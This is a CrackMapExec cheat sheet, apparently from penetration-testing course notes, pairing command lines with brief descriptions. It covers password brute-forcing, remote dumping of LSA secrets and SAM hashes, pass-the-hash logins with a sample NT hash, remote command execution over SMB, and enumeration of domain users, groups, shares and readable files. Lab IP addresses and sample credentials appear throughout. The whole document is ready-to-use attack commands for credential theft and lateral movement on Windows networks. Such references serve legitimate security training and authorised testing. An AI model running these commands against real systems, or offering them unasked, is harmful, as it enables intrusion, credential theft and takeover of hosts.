crackmapexec <protocol> <ip/FQDN> -u <username or list> -p <password or list> |
Login to the protocol by credentials or bruteforce |
crackmapexec smb <ip> --local-auth -u <username> -p <password> --lsa |
Dumping LSA Secrets Remotely |
crackmapexec smb <target_ip> -u <username> -d . -H <Hash> -x <command> |
Remote executes command using NT hash |
crackmapexec smb 10.10.110.17 -u Administrator -p 'Password123!' -x 'whoami' --exec-method smbexec |
Execute a command over the SMB service using smbexec. |
crackmapexec smb 10.10.110.0/24 -u administrator -p 'Password123!' --loggedon-users |
Enumerating Logged-on users. |
crackmapexec smb 10.10.110.17 -u administrator -p 'Password123!' --sam |
Extract hashes from the SAM database. |
crackmapexec smb 10.10.110.17 -u Administrator -H 2B576ACBE6BCFDA7294D6BD18041B8FE |
Use the Pass-The-Hash technique to authenticate on the target host. |
sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 --users |
Authenticates with a Windows target over smb using valid credentials and attempts to discover more users (--users) in a target Windows domain. Performed from a Linux-based host. |
sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 --groups |
Authenticates with a Windows target over smb using valid credentials and attempts to discover groups (--groups) in a target Windows domain. Performed from a Linux-based host. |
sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 --shares |
Authenticates with a Windows target over smb using valid credentials and attempts to discover any smb shares (--shares). Performed from a Linux-based host. |
sudo crackmapexec smb 172.16.5.5 -u forend -p Klmcargo2 -M spider_plus --share Dev-share |
Authenticates with a Windows target over smb using valid credentials and utilizes the CrackMapExec module (-M) spider_plus to go through each readable share (Dev-share) and list all readable files. The results are outputted in JSON. Performed from a Linux-based host. |